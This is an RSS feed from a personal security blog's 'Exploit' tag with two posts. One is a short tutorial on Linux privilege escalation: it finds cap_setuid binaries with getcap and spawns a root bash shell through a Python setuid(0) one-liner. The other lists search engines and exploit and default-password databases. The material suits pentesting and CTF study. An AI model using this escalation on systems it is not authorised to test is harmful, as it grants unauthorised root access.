<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Exploit on slightlymore</title><link>https://slightlymore.co.uk/tags/exploit/</link><description>Recent content in Exploit on slightlymore</description><generator>Hugo</generator><language>en-GB</language><copyright>&lt;a href="https://creativecommons.org/licenses/by/4.0/" target="_blank" rel="license"&gt;CC BY 4.0&lt;/a&gt; by Clinton Montague</copyright><lastBuildDate>Sun, 25 Jan 2026 00:14:01 +0000</lastBuildDate><atom:link href="https://slightlymore.co.uk/tags/exploit/index.xml" rel="self" type="application/rss+xml"/><item><title>How to get a root shell using results from getcap</title><link>https://slightlymore.co.uk/how-to-get-a-root-shell-using-results-from-getcap/</link><pubDate>Mon, 01 Dec 2025 00:00:00 +0000</pubDate><guid>https://slightlymore.co.uk/how-to-get-a-root-shell-using-results-from-getcap/</guid><description>&lt;p&gt;&lt;code&gt;getcap&lt;/code&gt; is a program to get capabilities of others. The one which is a way in is &lt;code&gt;cap_setuid&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;getcap -r / 2&amp;gt;/dev/null
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If anything&amp;rsquo;s listed which lets you script, you can use that to get a shell. Here&amp;rsquo;s a Python example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;python3 -c &lt;span class="s1"&gt;&amp;#39;import os; os.setuid(0); os.system(&amp;#34;/bin/bash&amp;#34;)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description></item><item><title>Useful search engines</title><link>https://slightlymore.co.uk/useful-search-engines/</link><pubDate>Thu, 27 Nov 2025 00:00:00 +0000</pubDate><guid>https://slightlymore.co.uk/useful-search-engines/</guid><description>&lt;h2 id="meta-search"&gt;Meta search&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.kagi.com" target="_blank" rel="noopener"&gt;Kagi ↗️&lt;/a&gt;
 premium (paid for and ad-free) search prioritising privacy and user experience. Reminiscent of the good-old-days&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/searxng/searxng" target="_blank" rel="noopener"&gt;SearXNG ↗️&lt;/a&gt;
 self-hostable, open-source metasearch engine that aggregates results from 200+ engines. There are hosted versions but privacy or veracity is not guaranteed&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="specialist"&gt;Specialist&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.virustotal.com/" target="_blank" rel="noopener"&gt;Virus Total ↗️&lt;/a&gt;
 meta engine for checking files and their hashes against virus databases&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.shodan.io/" target="_blank" rel="noopener"&gt;Shodan ↗️&lt;/a&gt;
 is an engine to find devices connected to the internet&lt;/li&gt;
&lt;li&gt;&lt;a href="https://search.censys.io/" target="_blank" rel="noopener"&gt;Censys ↗️&lt;/a&gt;
 searches hosts, IPs, certificates&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="exploits-and-cve-databases"&gt;Exploits and CVE databases&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.exploit-db.com/" target="_blank" rel="noopener"&gt;ExploitDB ↗️&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.rapid7.com/db/" target="_blank" rel="noopener"&gt;Rapid7 ↗️&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.vulnerability-lab.com/" target="_blank" rel="noopener"&gt;Vulnerability Lab ↗️&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://nvd.nist.gov/search" target="_blank" rel="noopener"&gt;NIST NVD ↗️&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://gtfobins.github.io/" target="_blank" rel="noopener"&gt;GTFOBins ↗️&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cirt.net/passwords/" target="_blank" rel="noopener"&gt;Default password database ↗️&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;</description></item></channel></rss>